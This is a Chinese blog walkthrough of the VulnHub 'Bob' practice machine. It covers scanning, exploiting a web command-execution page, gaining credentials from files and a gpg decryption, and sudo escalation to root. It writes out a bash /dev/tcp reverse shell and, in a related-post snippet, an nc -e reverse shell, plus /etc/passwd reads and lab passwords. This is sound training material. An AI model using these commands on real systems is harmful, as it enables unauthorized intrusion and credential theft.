VulnHub-Bob靶机详细渗透过程

最新推荐文章于 2023-07-29 18:16:10 发布
最新推荐文章于 2023-07-29 18:16:10 发布
阅读量832 收藏 8
点赞数 3
分类专栏: 教程 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MRS_jianai/article/details/128462693
版权

1.靶机部署

kali安装:https://blog.csdn.net/l2872253606/article/details/123592717?spm=1001.2014.3001.5502
靶机下载: https://download.vulnhub.com/bob/Bob_v1.0.1.ova
image.png
使用VMware打开该文件:
image.png
设置好名称和虚拟机位置:
注意:导入过程中可能会提示导入失败,点击重试即可。
image.png
进行基本设置:
image.png
导入成功,打开虚拟机,到此虚拟机部署完成!
image.png
注意:靶机的网络连接模式必须和kali一直,让DC靶机跟kali处于同一网段,这用kali才能扫出DC的主机。

2.信息收集

2.1 探测IP

使用nmap扫描一下,发现151开启了80端口,浏览器访问一下发现就是我们的靶场:

192.168.11.0/24

image.png

2.2 详细信息扫描

nmap -A -T4 -p- 192.168.11.151

image.png

2.3 敏感目录

使用dirsearch扫描一下敏感目录:

dirsearch -u 192.168.11.151 -e *

image.png

2.4 指纹收集

扫描一下网站的CMS等信息:

whatweb -v 192.168.11.151

image.png

3.渗透过程

3.1 漏洞发现

我们在扫描网站敏感目录的时候曾看见过一个/robots.txt文件,访问一下试试:
image.png
逐个访问一下这几个目录,最后在/dev_shell.php文件下发现点东西:
image.png
试一下能不能执行linux命令:
image.png

3.2 反弹shell

既然可以执行反弹shell命令,那我们试着反弹一下shell,使用bash反弹:
首先kali开启监听:
image.png
输入框输入反弹shell代码:

bash -c ‘exec bash -i &>/dev/tcp/192.168.11.128/4444 <&1’

image.png
查看用户,发现了六个用户:

cat /etc/passwd | grep /bin/bash

image.png
大概对目录进行了查看,最后在/home/bob发现了一个名叫.old_passwordfile.html的文件,查看其内容发现了两组用户名和密码:

jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3

image.png

3.3 登录用户

使用得到的用户ssh登录,注意端口不是默认端口
image.png
继续搜查目录:
在/home/bob/Documents目录下发现了一个login.txt.gpg文件,是个加密文件。
image.png
继续搜查,发现一个脚本文件,内容是输出一些语句,每行的首字母都是大写,将每一行的大写字母都提取出来 HARPOCRATES,这会不会就是刚刚加密文件的密码?
image.png
回到加密文件所在的地方,解密试试:

gpg --batch --passphrase HARPOCRATES -d login.txt.gpg

解密之后得到bob的用户名和密码:

bob:b0bcat_

image.png
使用bob用户登录,注意端口不是默认的22:

ssh bob@192.168.11.151 -p 25468

image.png

3.4 提权

查看bob有什么权限:

sudo -l

image.png
ALL,这是什么操作,bob拥有root用户的所有权限,那还不直接起飞:
image.png
果然,童话里都是骗人的,乖乖提权吧!!!
既然bob拥有root的所有的权限,那是不是可以直接切换root用户:

sudo su

image.png
提权成功!!!

夺旗

image.png

小秋LY
关注
  • 3
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
渗透入门之BOB靶机渗透实战
CongM_JueD的博客
09-03 832
渗透入门初体验
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
vulnhub Bob: 1.0.1
箭雨镜屋
04-27 1542
渗透思路:nmap扫描----通过robots.txt得到/dev_shell目录----利用RCE得到反弹shell----找到.gpg文件密码并解密----sudo su提权
Vulnhub靶机 bob
菜浪马废的博客
04-28 252
一个用户名bob 一个提示:运行了webshell 尝试id 有回显 抓包看一下 /bin/nc 192.168.0.128 443 -e /bin/sh 给了个账号 ssh登录 爆破文件 给了bob的账号
vulnhubBob_1.0.1
qq_45300786的博客
11-24 226
http://www.mamicode.com/info-detail-3079690.html https://www.jianshu.com/p/30165f430175?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation
vulnhub靶场,Bob_v1.0.1
m0_63755076的博客
09-27 473
但是发现好像没有读取成功,可能是这个命令解释器的问题,使用python生成一个交互式的shell再次查看。发现里面有jc用户和seb用户的密码,先不适用ssh进行连接,看看他们的家目录里面有什么。说什么ftp的后门,也没搞懂他说的的意思,还有一个gpg文件,但是想要解密就需要拿到密钥。发现是一个学校的官网,查看一下基本内容发现没有什么发现,大概的内容就是学校的网站被黑了。分别访问这几个页面看看都有什么发现,当我们访问这个页面的时候,发现可能是一个命令行。成功获得bob用户的密码,切换为bob用户。
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
BOB靶机渗透实战-----攻略(大神勿喷)
z2560088的博客
09-21 1972
准备工作 靶场 Bob: 1.0.1 ~ VulnHub 攻击工具kali虚拟机 直接双击打开即可添加到虚拟机。打开后网卡使用NAT模式。 没有给用户名和密码。(给了就没有攻击的必要了 hhh) 开始攻击 打开kali 使用nmap 扫描同网段下的ip和端口(因为靶机也用的NAT模式的网卡,所以按理说应该被分在了与kali虚拟机同网段的某一个ip地址) 我的kali ip 地址为192.168.160.129 nmap -sP 192.168.160.0/24 ...
Bob靶机攻击记录
m0_56375711的博客
08-13 327
bob靶机攻占记录~
记:渗透测试-靶机训练Bob1.0.1
Anderlos
06-24 917
前言 来CSDN划水有几年了,一直处于学习的状态,直到今天才发第一篇文章,就以基础渗透作为开篇吧,技术不到位还望大佬们手下留情,话不多说直接进入分享 首先请出靶机 靶机界面 然后进入kali(其实是为了分享一波桌面) 首先确定一点问题就是,我们需要知道对方IP地址是多少(因为是在虚拟机环境内所以注定IP地址不会太多,所以我们既已知在一个网段内,只需要扫描出这个网段的所有主机即可) ip addr 先通过ip addr来确认一下我们...
公钥方式登录远程服务器
gao_bob的博客
12-18 2624
公钥方式登录远程服务器
暴打bob靶机
qq_41263192的博客
09-04 3571
实验环境: kali:192.168.126.130 bob靶机:192.168.126.129 一、信息收集 扫描目标ip地址 扫描目标主机的端口发现有80端口,尝试登录网页查看在网页中查找到了相关信息 大意是,学校网站被黑客攻击,之后将不能登录网站之类的。 在网站的联系我们中找到了关键词:admin,所以推测bob J有可能是管理员 扫描网站的目录,继续查看网站的其他子目录这里只有状态码为200的网页才可以正常查看 查看robots.txt 目录,发现其下的隐藏目录 二、getshell 继续查
实验六 Bob渗透
m0_56948411的博客
12-03 7024
实验六 Bob渗透一、实验目的1. 通过对目标靶机渗透过程,熟悉网络扫描、代码审计、权限提升、Linux中文件命令的使用和提高对信息挖掘的能力。二、实验环境攻击工具:kali虚拟机(10.24.231.60)靶场:Bob:1.0.1~VulnHub三、实验原理找到初始信息,比如一个ip地址或者一个域名;找到网络地址范围,或者子网掩码,找到开发端口和入口点,弄清每个端口运行哪种服务,找到目标存在的漏洞;找到账号密码从而提高权限获取最终胜利。四、实验过程及分析(一)信息收集如图1-1,1-2,使用nmap扫描
[B2R]Bob1.0.1
qq_44339430的博客
03-22 977
[B2R]Bob:1.0.1 https://www.vulnhub.com/entry/bob-101,226/ 0x01 靶场信息 靶机界面 ​ 直接从ova文件导入到VM虚拟机中,启动即可。网卡模式选择为NAT模式。 0x02 信息收集 主机发现 ​ NAT模式网卡MAC地址为00:0C:29:5C:C9:AE sudo nmap -sP 192.168.94.0/24 -oN nmap.Bob ​ 可以确定靶机IP地址为192.168.94.134 端口扫描 sudo nmap 192
BOB_1.0.1靶机详解
最新发布
weixin_44681307的博客
07-29 343
然后我们在elliot的家目录发现一个txt文件,打开后发现里面有他的密码,也有James用户的密码。找到ip地址后对IP进行一个单独的扫描,发现ssh端口被改到25468了,等会儿登陆时候需要用到。但是关键词被过滤了,我们在ls中级加两个反斜线就发现可以使用ls命令,下面信息有反馈。然后make一下.c文件,这样就出来一个可执行文件,执行后就拿到了root权限。其实几个用户都是一样的,这个靶机并没有什么能利用的点,但是内核漏洞可以利用。wget过来,file一下发现是一个zip文件,我们解压一下。
vulnhub靶场】Bob_v1.0.1靶机提权
qq_46421742的博客
07-29 236
免责声明:本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。
Vulnhub靶机渗透环境搭建及JIS-CTF入门实践
本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。 一、Vulnhub简介 Vulnhub是一个开源的渗透测试平台,提供了多种类型的...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小秋LY

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值